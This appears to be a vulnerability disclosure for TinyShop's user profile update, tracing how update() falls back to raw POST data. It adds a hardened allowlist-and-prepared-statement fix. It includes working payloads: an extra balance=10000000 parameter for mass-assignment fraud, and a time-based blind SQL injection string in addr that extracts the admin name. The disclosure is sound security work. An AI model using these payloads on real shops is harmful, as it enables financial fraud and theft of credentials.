### Summary:
See the details below.
### Details:
Look at
/protected/controllers/ucenter.php
```php
public function info_save()
{
    $name = Filter::sql(Req::args("name"));
    $id = $this->user['id'];
    $this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update();
    // No data() call here: update() is invoked without an explicit data array.
    $this->model->table("customer")->where("user_id=$id")->update();
    $obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find();
    $this->safebox->set('user',$obj,$this->cookie_time);
    $this->redirect("info");
}
```
Note this line:
```php
$this->model->table("customer")->where("user_id=$id")->update();
```
Following it into update():
```php
public function update()
{
    $sql = $this->sql;
    // No data array supplied by the caller: fall back to the raw POST body.
    if(!is_array($sql['data']) || count($sql['data'])<1)
    {
        $sql['data'] = Req::post();
    }
    $set = '';
    foreach($sql['data'] as $key => $val)
    {
        // Every column that exists in the table (other than the primary key) is accepted.
        if(is_string($key) && $key != $this->primary_key && isset($this->fields[$key]))
        {
            if(is_string($key))
            {
                $value = $val;
                if(is_null($val)){
                    $value = 'NULL';
                }else{
                    $value = $this->formatField($this->fields[$key],$val);
                }
                if(is_scalar($value))
                {
                    if(!is_array($val) && preg_match("/`$key`/i",trim($val))){
                        $set .= '`'.$key.'` = '.$val.',';
                    }
                    else $set .= '`'.$key.'` = '.$value.',';
                }
            }
        }
    }
    if($set!='')
    {
        // The SET clause is concatenated straight into the statement string.
        $set = 'set '.trim($set,',');
        $this->fields($set);
        $this->changeWhere();
        $sql = $this->sql;
        $sqlStr = "update {$sql['table']} {$set} {$sql['where']}";
        return $this->query($sqlStr);
    }
}
```
And Req::post():
```php
public static function post()
{
    $num = func_num_args();
    $args = func_get_args();
    if($num==1)
    {
        // Read one key.
        if(isset( $_POST[$args[0]])){
            if(is_array( $_POST[$args[0]]))return $_POST[$args[0]];
            else return trim( $_POST[$args[0]]);
        }
        return null;
    }
    else if($num>=2)
    {
        // Set or unset one key.
        if($args[1]!==null) $_POST[$args[0]] = $args[1];
        else if(isset($_POST[$args[0]])) unset($_POST[$args[0]]);
    }
    else
    {
        // No arguments: the whole POST array is returned.
        return $_POST;
    }
}
```
If update() is called without a data array, it takes the fields from the POST body, assigns them into the SET clause and puts them into the SQL statement. So every column of the customer table that a client names in the request gets written, and the values go into the statement as strings.
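The fix on the defender's side addresses both consequences of that fallback at once: the caller must name the columns it intends to write, the model must refuse anything outside an allowlist instead of reading the request, and values must be bound rather than concatenated. The following is an added example, not TinyShop's code; the class name SafeUpdater, the WRITABLE allowlist, the in-memory SQLite schema and the sample request are all assumptions constructed for the demonstration.

```php
<?php
// Added example (not TinyShop's code): a hardened update() that never falls back
// to $_POST and never interpolates values into SQL. The allowlist, table layout
// and request below are constructed for this demo.

final class SafeUpdater
{
    /** @var array<string, string[]> columns a user may change, per table (assumed) */
    private const WRITABLE = [
        'user'     => ['name'],
        'customer' => ['addr', 'phone'],
    ];

    public function __construct(private PDO $pdo) {}

    /**
     * Update $table for the row where $keyCol = $keyVal, restricted to allowlisted columns.
     * $keyCol is chosen by the controller, never by the request.
     * Returns the number of affected rows; throws instead of reading $_POST when $data is empty.
     */
    public function update(string $table, array $data, string $keyCol, int $keyVal): int
    {
        $allowed = self::WRITABLE[$table] ?? null;
        if ($allowed === null) {
            throw new InvalidArgumentException("table not writable: $table");
        }
        if ($data === []) {
            throw new InvalidArgumentException('update() requires an explicit data array');
        }
        // A request that carries extra columns (e.g. balance) is rejected as a whole.
        $unexpected = array_diff(array_keys($data), $allowed);
        if ($unexpected !== []) {
            throw new InvalidArgumentException('rejected columns: ' . implode(',', $unexpected));
        }
        $set = [];
        $params = [];
        foreach ($data as $col => $val) {
            // Column names come only from the allowlist; values are bound, not concatenated.
            $set[] = "`$col` = :$col";
            $params[":$col"] = $val;
        }
        $sql = sprintf('UPDATE `%s` SET %s WHERE `%s` = :keyval',
            $table, implode(', ', $set), $keyCol);
        $params[':keyval'] = $keyVal;
        $stmt = $this->pdo->prepare($sql);
        $stmt->execute($params);
        return $stmt->rowCount();
    }
}

// Constructed environment: an in-memory SQLite database standing in for MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, balance INTEGER DEFAULT 0)');
$pdo->exec('CREATE TABLE customer (user_id INTEGER, addr TEXT, phone TEXT)');
$pdo->exec("INSERT INTO user VALUES (1, 'old', 0)");
$pdo->exec("INSERT INTO customer VALUES (1, '', '')");

// Constructed request body: a legitimate name and address (with a quote in it)
// plus an extra balance field the client was never meant to set.
$_POST = ['name' => 'alice', 'addr' => "12 O'Brien St", 'balance' => '10000000'];

$u  = new SafeUpdater($pdo);
$id = 1;
// Controller picks the fields explicitly instead of forwarding the whole request.
$u->update('user',     ['name' => $_POST['name']], 'id',      $id);
$u->update('customer', ['addr' => $_POST['addr']], 'user_id', $id); // quote is inert data

try {
    $u->update('user', $_POST, 'id', $id); // what the original fallback amounted to
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
echo $pdo->query('SELECT balance FROM user WHERE id = 1')->fetchColumn(), "\n";
```

The allowlist is what stops the balance write, and the prepared statement is what stops the addr value from carrying SQL; the `rowCount()` return gives the controller something to check, which the original `update()` only did when `$set` was non-empty.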
#1 Unlimited top-up
After registering a user, go to the profile-edit page,
capture the request and add balance=10000000 to the existing parameters.
For example:
![1.jpg](https://images.seebug.org/upload/201407/1805401482fab3ce4a4110afd02ce61443d24d01.jpg)
![2.jpg](https://images.seebug.org/upload/201407/1805402827f61e8fe90d64b1d081fc597d68ef70.jpg)
As you can see, I became rich instantly... This system also supports withdrawals, so the impact is quite serious.
#2 Time-based blind injection
If magic_quotes_gpc is off, or PHP is a newer version without it, blind injection is also possible.
Change the addr parameter to: addr=' or if(ascii(substr((select name from tiny_manager),1,1))-97,null,sleep(2)) or '1
![1.jpg](https://images.seebug.org/upload/201407/1805480714643da52518cd1e6bb953478520bf78.jpg)
![2.jpg](https://images.seebug.org/upload/201407/18054821c00020091bf256bb49a935c412387d79.jpg)
The delay triggers.
### Proof of vulnerability:
![2.jpg](https://images.seebug.org/upload/201407/1805402827f61e8fe90d64b1d081fc597d68ef70.jpg)
![2.jpg](https://images.seebug.org/upload/201407/18054821c00020091bf256bb49a935c412387d79.jpg)